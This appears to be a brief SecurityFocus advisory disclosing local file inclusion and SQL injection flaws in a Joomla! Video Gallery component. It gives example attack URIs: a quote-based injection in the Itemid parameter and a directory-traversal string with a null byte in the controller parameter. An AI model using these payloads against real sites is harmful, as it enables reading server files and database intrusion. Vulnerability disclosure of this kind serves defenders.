Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues with a browser.

The following example URIs are available:

http://www.example.com/index.php?option=com_videogallery&Itemid=68'

http://www.example.com/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]--

http://www.example.com/&controller=../../../../../../../../../../../../[LFT]%00


 

Privacy Statement
Copyright 2010, SecurityFocus